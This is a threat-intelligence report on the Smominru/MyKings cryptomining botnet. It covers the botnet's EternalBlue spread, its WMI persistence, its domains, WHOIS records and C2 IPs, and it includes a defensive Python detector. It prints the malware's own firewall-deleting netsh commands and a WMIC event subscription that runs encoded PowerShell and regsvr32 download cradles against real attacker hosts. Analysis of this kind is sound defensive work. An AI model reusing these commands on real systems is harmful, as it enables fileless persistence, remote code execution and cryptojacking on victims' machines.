Summary
Beginning in August of 2017, a new cryptocurrency mining botnet, dubbed Smominru, started propagating via the recently leaked Eternal Blue exploit. Smominru, aka MyKings, is characterized by targeting Windows systems and using WMI as a fileless persistence mechanism.[1]
As of March 2019, Smominru showed no signs of slowing down. Wapack Labs has identified approximately 316K victims connecting to Smominru infrastructure over a period of 6 days. This report provides a high-level overview of the malware installation as well as details on the Smominru infrastructure and botnet.
Details
After the leak of NSA-developed exploits in 2017, several attackers incorporated them into malware campaigns. One of these came to be known as Smominru, a self-propagating botnet intended primarily for cryptocurrency mining. Smominru uses the Eternal Blue exploit[2] to infect systems and install a WMI payload. This payload triggers a number of additional commands and payload downloads, including the cryptocurrency miner as well as Mimikatz, a popular credential-dumping tool.
Along with the WMI payload, Smominru executes a large number of commands on the victim in order to prepare the system. Among these are commands for killing processes and services, changing access rights and reconfiguring the firewall.[1] Example commands:
taskkill /f /im help.exe /im doc001.exe /im dhelllllper.exe /im DOC001.exe /im dhelper.exe /im conime.exe /im a.exe /im docv8.exe /im king.exe /im name.exe /im doc.exe…
netsh advfirewall firewall delete rule name="tcp all" dir=in
netsh advfirewall firewall delete rule name="deny tcp 445" dir=in
netsh advfirewall firewall delete rule name="deny tcp 139" dir=in
netsh advfirewall firewall delete rule name="tcpall" dir=out
cacls C:\Windows\debug\WIA\*.exe /e /d everyone&cacls C:\Users\asp\AppData\Roaming\Tempo\*.exe /e /d everyone&cacls C:\Users\administrator\AppData\Roaming\Tempo /e /d everyone&cacls C:\Users\asp\AppData\Roaming\Tempo\*.exe /e /d system&cacls C:\Users\Default\AppData\Roaming\Tempo\*.exe
The malware uses the WMI command-line utility (WMIC) to create a permanent event subscription that triggers additional downloads.
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="fuckyoumm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="fuckyoumm4", CommandLineTemplate="cmd /c powershell.exe -nop -enc \"JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA==\"&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host/1.txt scrobj.dll&regsvr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll"&wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"fuckyoumm3\"", Consumer="CommandLineEventConsumer.Name=\"fuckyoumm4\""
This also achieves persistence: the event filter named ‘fuckyoumm3’ fires every 10800 seconds (3 hours), and the binding re-runs the consumer's command line each time. It is also a convenient way for the attacker to install additional malware on all of the bots, since they only need to swap out the hosted files. Finally, the Monero mining malware is installed; it connects to pool.minexmr.com to retrieve its configuration and begins mining.
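The subscription above has three parts a defender can triage independently: the __EventFilter's WQL query (its WITHIN interval is the polling period), the CommandLineEventConsumer's CommandLineTemplate (often carrying a base64 UTF-16LE -enc payload), and the binding that joins them. The following is an added example, not code from the report or from Wapack Labs: it decodes an -enc payload and scores the template against the download-cradle indicators visible in the report (WebClient, DownloadString/DownloadFile, IEX, regsvr32 scriptlet loading). The sample template and its example.invalid URLs are constructed for the demonstration.

```python
import base64
import re
from typing import List, Optional, Tuple

# Constructed sample in the style of the consumer shown above (not the
# report's own payload); the encoded form is built here so the block runs offline.
SAMPLE_SCRIPT = ("$wc=New-Object System.Net.WebClient;"
                 "IEX $wc.DownloadString('http://example.invalid/s.ps1')")
SAMPLE_TEMPLATE = ("cmd /c powershell.exe -nop -enc "
                   + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()
                   + " & regsvr32 /u /s /i:http://example.invalid/1.txt scrobj.dll")

# Indicators of a staged download cradle, weighted by how specific they are.
INDICATORS = {
    r"Net\.WebClient": 2,
    r"DownloadString|DownloadFile": 2,
    r"\bIEX\b|Invoke-Expression": 2,
    r"regsvr32\b.*?/i:https?://.*?scrobj\.dll": 3,   # remote scriptlet (squiblydoo)
    r"-nop\b|-NonInteractive\b|-w(indowstyle)?\s+hidden": 1,
}

def decode_encoded_command(template: str) -> str:
    """Return the decoded -enc/-EncodedCommand payload, or '' if there is none."""
    m = re.search(r'-(?:enc|encodedcommand|e)\s+[\\"]*([A-Za-z0-9+/=]+)', template, re.I)
    if not m:
        return ""
    try:
        # PowerShell encodes the script as UTF-16LE before base64.
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def score_consumer(template: str) -> Tuple[int, List[str]]:
    """Score a CommandLineTemplate; the decoded -enc payload is scanned as well."""
    text = template + "\n" + decode_encoded_command(template)
    hits = [pat for pat in INDICATORS if re.search(pat, text, re.I)]
    return sum(INDICATORS[p] for p in hits), hits

def filter_interval_seconds(query: str) -> Optional[int]:
    """Extract the WITHIN polling interval (seconds) from an __EventFilter WQL query."""
    m = re.search(r"\bWITHIN\s+(\d+)", query, re.I)
    return int(m.group(1)) if m else None

if __name__ == "__main__":
    score, hits = score_consumer(SAMPLE_TEMPLATE)
    print("decoded:", decode_encoded_command(SAMPLE_TEMPLATE))
    print("score:", score, "hits:", hits)
```

On a live host the same functions can be fed the output of enumerating root\subscription (for example with Get-CimInstance against __EventFilter, CommandLineEventConsumer and __FilterToConsumerBinding).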
Infrastructure
Smominru has used a number of different endpoints since it emerged in 2017. Its current network consists of a handful of IP addresses and domains. Most of the known domains share the same registrant email: billkillmenow@gmail.com. The domains follow the same loose naming convention, a combination of words and numbers, and a couple of them use the string ‘mykings’, an alias for Smominru. The domains use the Reg.ru registrar as well as the following state and country configuration:
Registrant State/Province: msk
Registrant Country: BF
Several other domains use the registrant email address ira.malikova78@mail.ru. The Smominru actors tried to obfuscate this email by using Whois protection services; however, it was identified by examining historic Whois records from before the protection was applied.
The following is an example Whois record:
Domain Name: 1217BYE.HOST
Registry Domain ID: D87766657-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2018-12-21T17:13:05.0Z
Creation Date: 2018-12-16T17:08:54.0Z
Registry Expiry Date: 2019-12-16T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization:
Registrant State/Province: msk
Registrant Country: BF
Registrant Phone: +7.4957654321
Registrant Email: billkillmenow@gmail.com
Admin Phone: +7.4957654321
Admin Email: billkillmenow@gmail.com
Tech Phone: +7.4957654321
Tech Email: billkillmenow@gmail.com
Name Server: NS1.REG.RU
Name Server: NS2.REG.RU
DNSSEC: unsigned
Billing Phone: +7.4957654321
Billing Email: billkillmenow@gmail.com
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2019-03-25T16:38:02.0Z <<<
The following table lists domains that are currently registered by Smominru actors.
Domain | Created | Registration info |
1217bye.host | 2018-12-16 | billkillmenow@gmail.com |
1226bye.pw | 2018-12-26 | billkillmenow@gmail.com |
1226bye.xyz | 2018-12-25 | billkillmenow@gmail.com |
5b6b7b.info | 2017-01-21 | billkillmenow@gmail.com |
down0116.info | 2018-01-16 | billkillmenow@gmail.com |
ftp0118.info | 2018-01-18 | billkillmenow@gmail.com |
ftp0930.host | 2018-09-30 | billkillmenow@gmail.com |
ms1128.site | 2018-11-28 | billkillmenow@gmail.com |
mykings.pw | 2018-04-11 | Protected Whois. Initially observed registrant: ira.malikova78@mail.ru |
mykings.xyz | | sinkholed |
mys2018.xyz | 2018-03-23 | Registrant State/Province: msk; Registrant Country: BF; Reg.ru |
pc0416.xyz | 2018-04-16 | Registrar URL: http://www.reg.com; Registrant State/Province: msk; Registrant Country: BF |
wpd0126.info | | Registrant State/Province: msk; Registrant Country: BF; Reg.ru |
upme0611.info | 2018-06-10 | Registrant State/Province: msk; Registrant Country: BF; Reg.ru |
649183ca17.pw | 2018-09-03 | ira.malikova78@mail.ru |
8e627797f3.pw | 2018-09-03 | ira.malikova78@mail.ru |
Wapack Labs identified 10 IP addresses currently being leveraged for Smominru’s command and control infrastructure. IP address 174.128.230.162, which is currently used for second-stage downloads, was by far the most frequently observed, with close to 300K unique IPs connecting to it.
Smominru C2 IP | Botnet Hits |
174.128.230.162 | 295230 |
45.58.135.106 | 69871 |
174.128.239.250 | 21202 |
66.117.6.174 | 1313 |
35.182.171.137 | 1107 |
64.32.3.186 | 1094 |
185.112.156.92 | 1088 |
223.25.247.240 | 511 |
173.208.139.170 | 353 |
208.110.71.194 | 316 |
Botnet
Wapack Labs analyzed traffic going to Smominru infrastructure over the course of 6 days and identified 316K unique IPs that are likely compromised with the Smominru coinminer. The vast majority were in AS4134 (No.31, Jin-rong Street), which is the top botnet ASN across the board.
The geolocation of Smominru bots revealed China and Russia to be the top two origins, with roughly the same number of bots each. Figure 3 shows the breakdown of bots by country.
Conclusion
Cryptocurrency mining botnets such as Smominru are especially problematic because not only can they lead to data loss, they also consume most of the processing power on an infected system. This in turn increases power consumption and greatly degrades the performance of the infected machine. Despite emergency patches issued by Microsoft, millions of systems still remained vulnerable to Eternal Blue as of late 2018. So long as machines are unpatched, they are at risk of being recruited by Smominru.
[1] https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-miner-uses-wmi-eternalblue-spread-filelessly/
[2] https://www.virustotal.com/#/file/85aded78821dafa60971ce19201bea3f34bbadb64b81ef882b406f8312abfa4a/detection